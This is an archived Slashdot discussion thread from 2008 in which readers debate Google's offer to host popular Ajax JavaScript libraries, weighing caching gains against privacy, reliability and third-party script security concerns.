Catch up on stories from the past week (and beyond) at the Slashdot story archive

 



Forgot your password?
typodupeerror
×
Programming Businesses Google The Internet IT Technology

Google To Host Ajax Libraries 285

ruphus13 writes "So, hosting and managing a ton of Ajax calls, even when working with mootools, dojo or scriptaculous, can be quite cumbersome, especially as they get updated, along with your code. In addition, several sites now use these libraries, and the end-user has to download the library each time. Google now will provide hosted versions of these libraries, so users can simply reference Google's hosted version. From the article, 'The thing is, what if multiple sites are using Prototype 1.6? Because browsers cache files according to their URL, there is no way for your browser to realize that it is downloading the same file multiple times. And thus, if you visit 30 sites that use Prototype, then your browser will download prototype.js 30 times. Today, Google announced a partial solution to this problem that seems obvious in retrospect: Google is now offering the "Google Ajax Libraries API," which allows sites to download five well-known Ajax libraries (Dojo, Prototype, Scriptaculous, Mootools, and jQuery) from Google. This will only work if many sites decide to use Google's copies of the JavaScript libraries; if only one site does so, then there will be no real speed improvement. There is, of course, something of a privacy violation here, in that Google will now be able to keep track of which users are entering various non-Google Web pages.' Will users adopt this, or is it easy enough to simply host an additional file?"
This discussion has been archived. No new comments can be posted.

Google To Host Ajax Libraries

Comments Filter:
  • by nguy ( 1207026 ) on Wednesday May 28, 2008 @10:26AM (#23570327)
    Compared to all the other crappy media that sites tend to have these days, centralizing distribution of a bunch of Javascript libraries makes almost no sense. I doubt it would even appreciably reduce your bandwidth costs.
  • by GigaHurtsMyRobot ( 1143329 ) on Wednesday May 28, 2008 @10:28AM (#23570349) Journal

    If you want to improve the speed of downloading, how about removing 70% of the code which just encodes/decodes from XML and start using simple and efficient delimiters? I was a fan of Xajax, but I had to re-write it from scratch... XML is too verbose when you control both endpoints.

    It is not a problem to host an additional file, and this only gives Google more information than they need... absolutely no good reason for this.

  • Well doh (Score:4, Insightful)

    by Roadmaster ( 96317 ) on Wednesday May 28, 2008 @10:28AM (#23570351) Homepage Journal

    Will users adopt this, or is it easy enough to simply host an additional file?
    Well duh, it's dead easy for me to just host another file, so easy in fact that web frameworks usually do it for you by default, but that's missing the point: the point is that for the end-user it would be better, faster and more efficient if I went to the trouble of using google's hosted version, instead of using my local copy. That, indeed, would be more work for me, but it benefits the end user.
  • by CastrTroy ( 595695 ) on Wednesday May 28, 2008 @10:31AM (#23570391)
    This is only a partial solution. The real solution is for sites using AJAX to get away from this habit of requiring hundreds of kilobytes of scrip just to visit the home page. Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple pages wouldn't have to download the entire library. Have each function in it's own file, and then when an AJAX call is done, make it smart enough to figure out which functions need to be downloaded to run the resulting Javascript. The problem with Google hosting everything, is that everybody has to use the versions that Google has posted, and that you can't do any custom modifications to the components. I think that what Google is doing would help. But the solution is far from optimal.
  • Nifty (Score:1, Insightful)

    by Anonymous Coward on Wednesday May 28, 2008 @10:32AM (#23570407)
    Now if only this could be done with GWT. Rather than building on a base-library, GWT vomits a slew of files all with hashed names. Since no two compiles are the same, you end up with an ever growing set of JS and HTML files sitting in the component directory. This is particularly annoying as all these files interact poorly with version control systems. (Even one as advanced as, say, Mercurial.)

    At the very least, a standard ANT plugin so that GWT could be built at build-time rather than dev-time would do wonders for the project.
  • I won't adopt (Score:5, Insightful)

    by corporal_clegg ( 547755 ) on Wednesday May 28, 2008 @10:37AM (#23570461) Homepage
    As a developer, privacy of my users is of paramount importance. I have grown increasingly concerned with Google's apparently incessant need to pry into my searches and my browsing habits. Where once I was a major Google supporter, I have trimmed my use of their service back from email and toolbars to simple searches and now even won't use their service at all if I am searching for anything that may be misconstrued at some point by guys in dark suits with plastic ID badges. The last thing I am going to do as a developer is force my users into a situation where they can feed the Google Logging Engine.
  • Re:Couldn't be... (Score:5, Insightful)

    by Jellybob ( 597204 ) on Wednesday May 28, 2008 @10:42AM (#23570545) Journal

    Also, those hosted js files would be prime targets for people who want to spread their malware, so I sure hope they're safe...

    Yes, you've gotta be careful with those incompetant sysadmins that Google are hiring.

    After all, they're constantly getting the servers hacked.
  • Comment removed (Score:3, Insightful)

    by account_deleted ( 4530225 ) on Wednesday May 28, 2008 @10:43AM (#23570557)
    Comment removed based on user account deletion
  • by Bobb Sledd ( 307434 ) on Wednesday May 28, 2008 @10:46AM (#23570603) Homepage
    Yikes...

    Maybe it is possible to get TOO modular. Several problems with that:

    1. With many little files comes many little requests. If the web server is not properly set up, then the overhead these individual requests causes really slows the transmission of the page. Usually, it's faster to have everything in one big file than to have the same number of kilobytes in many smaller files.

    2. From a development point of view, I use several JS bits that require this or that library. I don't know why or what functions it needs. And I really don't care; I have my own stuff I want to worry about. I don't want to go digging through someone else's code (that already works) to figure out what functions they don't need.

    3. If I do custom work where file size is a major factor or if I only use one function from the library, I guess then I'll just modify as I see fit and host on my own site.

    I think what Google is doing is great, but I can't really use it for my sites (they're all secure). So unless I want that little warning message to come up, I won't be using it.
  • by maxume ( 22995 ) on Wednesday May 28, 2008 @10:51AM (#23570661)
    In theory, cache hits wouldn't give Google an information at all. So when the api works the way it is supposed to, it doesn't reveal anything.

    Someone could even put up a site called googlenoise.com or whatever, with the sole purpose of loading the useful versions of the library into the cache from the same place.
  • by ClayJar ( 126217 ) on Wednesday May 28, 2008 @10:52AM (#23570677) Homepage

    Couldn't you design a modular AJAX system that would bring in functions as they are needed? That way, someone visiting just a couple pages wouldn't have to download the entire library. Have each function in it's own file, and then when an AJAX call is done, make it smart enough to figure out which functions need to be downloaded to run the resulting Javascript.
    Actually, the trend is in the opposite direction. By including everything in one file, you can greatly reduce the number of HTTP transactions. Eliminating the significant overhead there can improve "speed" tremendously.

    Additionally, if you're using compression, it is likely that one large file will compress more effectively than a collection of smaller files. (You *are* using compression, aren't you?)
  • by Daengbo ( 523424 ) <daengbo&gmail,com> on Wednesday May 28, 2008 @10:54AM (#23570707) Homepage Journal
    You have to consider that Google is a for-profit business and hosting these files represents a bandwidth cost and a maintainence cost for them.

    The bandwidth cost should be small since Google uses these libraries already and the whole idea is to improve browser caching. The maintenance cost of hosting static content shouldn't be that high, either. I mean, really.

    Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image.. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.
  • by socsoc ( 1116769 ) on Wednesday May 28, 2008 @11:12AM (#23570955)
    Google Analytics is invaluable for small business. AWStats and others cannot compete on ease of use and accuracy. By blocking the domain in your hosts file, you aren't sticking it to Google, you are hurting the Web sites that you visit. I'm employed by a small newspaper and we use Google Analytics in order to see where our readers are going and how we can improve the experience for you. Google already has this information through AdSense, or do you have that blocked too? Again you're hurting small business.

    You may refuse to give them your data, but if I had the ability, Apache would refuse to give you my data until you eased off on the attitude.
  • by causality ( 777677 ) on Wednesday May 28, 2008 @11:14AM (#23570979)

    Since the labor, hardware, and bandwidth costs all seem to be low, Google wouldn't be under pressure to make the investment pay. Google hosts lots of things that don't benefit them directly and from which they gain no real advantage except image.. Despite being a data-mining machine, Google does a lot of truly altruistic stuff.

    Low cost != no cost. While you definitely have a point about their corporate image, I can't help but say that recognizing a company as a data-mining machine as you have accurately done, and then assuming (and that's what this is, an assumption) an altruistic motive when they take an action that has a strong data-mining component, is, well, a bit naive. I'm not saying that altruism could not be the case and that profit must be the sole explanation (that would also be an assumption); what I am saying is that given the lack of hard evidence, one of those is a lot more likely.
  • by telbij ( 465356 ) on Wednesday May 28, 2008 @11:16AM (#23571003)
    Is it really necessary to be so dramatic?

    When you visit a website, the site owner is well within their rights to record that visit. To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated. The negotiation is between Google and website owners.

    If you want to think of your HTTP requests as your data, then you'd probably best get off the Internet entirely. No one is every going to pay you for it.

    Also:

    To the folks who say "well how else are they supposed to make money"


    Red herring. No one says that. No one even thinks about that. Frankly there are far more important privacy concerns out there than the collection of HTTP data.
  • by Anonymous Coward on Wednesday May 28, 2008 @11:23AM (#23571079)
    and your company is who? thanks for the useful info on how i can use your company's service...
  • by Rich ( 9681 ) on Wednesday May 28, 2008 @11:34AM (#23571227) Homepage
    Well, one effect of this would be to allow google to execute scripts in the security context of any site using their copy of the code. The same issue occurs for urchin.js etc. If your site needs to comply with regulations like PCI DSS or similar then you shouldn't be doing this as it means google has access to your cookies, can change your content etc. etc.

    For many common sites that aren't processing sensitive information however, sharing this code is probably a very good idea. Even better would be if google provided a signed version of the code so that you could see if it has been changed.
  • by Anonymous Coward on Wednesday May 28, 2008 @11:58AM (#23571615)

    When you visit a website, the site owner is well within their rights to record that visit.


    Yes.

    To assert otherwise is an extremist view that needs popular and legislative buy-in before it can in any way be validated.

    Strawman. The grandparent made no such assertion.

    While technically true, your strawman is false in spirit. The site owner must post a privacy policy in order to do anything with that data.

    The negotiation is between Google and website owners.

    False. You are downloading from Google's servers directly regardless of who referred you, therefore subject to Google's privacy policies and not an uninvolved third party.
  • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @12:01PM (#23571675) Homepage
    Oh no! If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

    I'm *so* scared.

    Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

    And if Google is hacked, we're ALL screwed a hundred different ways. The average web developer *using* these libraries is more likely to have a vulnerable server than Google.
  • Dependency hell? (Score:4, Insightful)

    by jmason ( 16123 ) on Wednesday May 28, 2008 @12:01PM (#23571677) Homepage
    One site covering this [ajaxian.com] noted plans to 'stay up to date with the most recent bug fixes' of the hosted libraries -- this sounds like blindly upgrading the hosted libraries to new versions, which is a very bad idea.

    As a commenter there noted, it's a much better idea to use version-specific URIs, allowing users to choose the versions they wish to use -- otherwise version mismatches will occur between user apps and the Google-hosted libs, creating bugs and the classic 'dependency hell' that would be familiar to anyone who remembers the days of 'DLL hell'.
  • Re:Couldn't be... (Score:3, Insightful)

    by Anonymous Coward on Wednesday May 28, 2008 @12:15PM (#23571913)
    Single-point-of-failure, DNS-cache-poisoning, host-file-redirects, etc. etc.

    You are not thinking this through!
  • by JavaRob ( 28971 ) on Wednesday May 28, 2008 @01:35PM (#23573171) Homepage Journal

    but now you also have the traffic pattern data for any of those sites that didn't use google analytics already, that's definitely valuable.
    No, they don't. Look again at how caching works. The first time a given browser hits a site that uses Prototype, for example, it'll pull the JS from Google (so Google sees that single site). The browser then hits 20 other sites that also use Prototype... and Google has no clue, because the JS is already cached.

    In fact, the cache headers specify that the JS libs don't expire for A YEAR, so Google will only see the first site you visit with X library Y version in an entire year.

    Is this information really that valuable?

    Mind you, this assumes you're hard-coding the google-hosted URLs to the JS libs, instead of using http://www.google.com/jsapi [google.com] -- but that's a perfectly valid and supported approach.

    If you use their tools to wildcard the library version, etc. etc. then they get a ping each time that JSAPI script is loaded (again, no huge amount of info for them, but still you can decide whether you want the extra functionality or not).
  • by Anonymous Coward on Wednesday May 28, 2008 @01:39PM (#23573245)

    What's the purpose of Privacy Policy then?

    I certainly hope you're not talking about P3P [w3.org] because that extra header means nothing in the real world. As for the typical "Read our privacy policy" links which almost always lead to legalese, there have been enough sites changing privacy policy as they see fit without even bothering about notifying their users.

    Privacy policies are the saddest joke on the internet at the expense of anyone who's naive enough to believe them. Only a few high profile sites will bother obeying them out of fear for litigation, and I wouldn't be surprised if your precious personal data gets stolen by an employee looking for a quick buck.

    As for its purpose: it reassures users that their personal data is safe with the company, while they carefully enter their personal information which is then usually POST'ed over plain old HTTP.

  • by richardtallent ( 309050 ) on Wednesday May 28, 2008 @01:45PM (#23573361) Homepage
    Do you *honestly* think that Google is going to modify the code for Prototype and slap some AdSense/Analytics goodies in there?

    The library developers would have their hide if they attempted such a thing!

    And I'm NOT wrong about cookies. Your site's cookies are not sent in the HTTP request, they would only be accessible via JavaScript--and again, without Google modifying the source code of these libraries to be malicious, they wouldn't be privy to those cookies.

    Not that cookies store anything useful these days... almost everyone with serious server-side code uses server-side persisted sessions, so the only cookie is the session ID.
  • by caerwyn ( 38056 ) on Wednesday May 28, 2008 @01:58PM (#23573561)
    I'll take the benefits of Google supporting open source over "GSoC is evil" paranoia.

    If Google suddenly decides to stop hosting these, or touches them in some fashion, it's going to get discovered and fixed in well under 24 hours. Google hosting a file like this means that there are going to be a *lot* of eyes on the file.

    Google is, as it currently stands, far from "dangerous to the health of the web". Outside of using their webmail fairly heavily, I could avoid using google quite easily- as could any other web user. Many websites are more dependent on them due to Google being their source of income, but the fact that Google has effectively created a niche for small websites to live in can hardly be viewed as a negative.
  • by joelwyland ( 984685 ) on Wednesday May 28, 2008 @02:10PM (#23573723)

    the extra DNS queries necessary to download the file from a third-party server _reduce_ the responsiveness, often severely.
    Yeah, who is this google.com that I have to download this JS from? I've never been there before and that DNS lookup is really going to hurt.
  • Re:Couldn't be... (Score:2, Insightful)

    by joelwyland ( 984685 ) on Wednesday May 28, 2008 @02:25PM (#23573953)
    No one said they were hackerproof. However, how often do you hear about them getting hacked? They put a significant amount of energy into security.
  • by robo_mojo ( 997193 ) on Wednesday May 28, 2008 @02:26PM (#23573967)

    When you visit a website, the site owner is well within their rights to record that visit.
    Yup. I have no way to stop them, afterall.

    The negotiation is between Google and website owners.
    Nope. If the website owner wanted to transmit information to Google, he can do so by having his server contact Google, or by dumping his logs to Google.

    Instead, if the website owner sends code to my browser to give information to Google, I am within my rights to refuse to do so.

    Alternatively, the website owner in question could host his own data-analysing tools on his domain. There exists plenty of free software for this (just as most other domain services Google offers).
  • by Anonymous Coward on Wednesday May 28, 2008 @02:31PM (#23574035)

    If Google decides they don't want to spend the $10/year this will cost them anymore, I might have to change a header and footer script! Or *gasp* use a search-and-replace to fix the URLs!

    OK, hypothetical situation it is. Google offlines the javascript. All of your customers websites break, some of them are medium to high profile webbusinesses. For the next two or three hours, they aren't receiving any orders. Their potential customers think "Oh well, this site is broken, I'll just buy it from the competitor whose website seems to work".

    Three hours have passed, and your customers suddenly realize there's something wrong with their website. They all call you in a timespan of 30 minutes. It takes you half an hour to find the problem, it takes you a couple of hours to fix all the sites. The business day is over.

    Some of your customers are happy you fixed their website, but most will angry at you because you trusted a third party website with their business and they've lost potential revenue from that. You've lost time, cost customers money and potentially have lost future business with those customers.

    I'm *so* scared.

    And yet you haven't even thought of SLAs and lawyers yet.

    Google is supporting web apps and offering to host the nasty boring bits that need strong caching. How very evil of them.

    Evil? No, not really. They've gotten publicity, some statistics, and a whole lot of people who are now depending on them while they've got a nice disclaimer somewhere waving most responsability.

  • by vux984 ( 928602 ) on Wednesday May 28, 2008 @02:35PM (#23574089)
    Well that's just the dilemma. I use Google Analytics on all my sites, and sort of use the information to see what keywords are effective and most common. I don't then turn around and use that information to focus my content on those areas like any smart person would, but I don't really care if someone stumbles across my blog either (much more interesting are HeatMaps, not that I use that information in a meaningful way either).

    The real bullshit is that you used to be able to BUY urchin fairly reasonably, and host it on your own server, and get nearly the same reports, and analytics, and without having to give up your data, and letting google track all your visitors from site to site.

    Someone needs to reverse engineer analyitics and make an open source version of it... wish I had the time. And sadly, the only people who'd ever use it are those concerned about the ramifications of feeding google data... which is surprisingly few. If it were Microsoft doing this, people would be up in arms... when will people wake up and realize that Google is the new Microsoft. They aren't the underdog fighting the 800lb gorilla. They are the 800lb gorilla. But instead of bending people over with embrace and extend and rapacious licensing, they get you insidiously with endless stream of "free product"... and all it costs you is a little data... and there's no harm in a little anyonymous data... ...until it reaches a critical mass and suddenly its not a little data anymore, nor is it anonymous, it all fits together to give a more complete composite picture of you than you EVER would have agreed to...

    Google is a death by a thousand tiny cuts.
  • by Anonymous Coward on Wednesday May 28, 2008 @02:35PM (#23574101)

    a) The goal is to have JavaScript files cached regularly, so as you go to other sites the browser will read the library from the cache and never have to hit Google!

    Fine, except what expiry are you going to put on it? How often will the etag change? Browsers check for changed files; sending the google.com cookie with that request, and lo, you get our SID again

  • by Anonymous Coward on Wednesday May 28, 2008 @03:05PM (#23574533)
    You're going to risk that your site doesn't work when someone blocks third-party javascript? Just to shave a few kBytes of script load time from your site?
  • Re:Umm, no (Score:3, Insightful)

    by Just Some Guy ( 3352 ) <kirk+slashdot@strauser.com> on Wednesday May 28, 2008 @06:19PM (#23577679) Homepage Journal

    Something that may be affecting the differing results you two are seeing is that the call to check if a file has been modified is browser and user settings dependent.

    In fairness to AC, he may also be connecting to some ancient or broken server that doesn't support the "Cache-Control: max-age" or "Expires:" headers. If that's the case, or if he's running a noncompliant browser that improperly handles those, then it's possible that he's making a lot more requests than necessary.

    Either way, it's still a problem between his browser and that server, and not a problem with HTTP in general.

The key elements in human thinking are not numbers but labels of fuzzy sets. -- L. Zadeh

Working...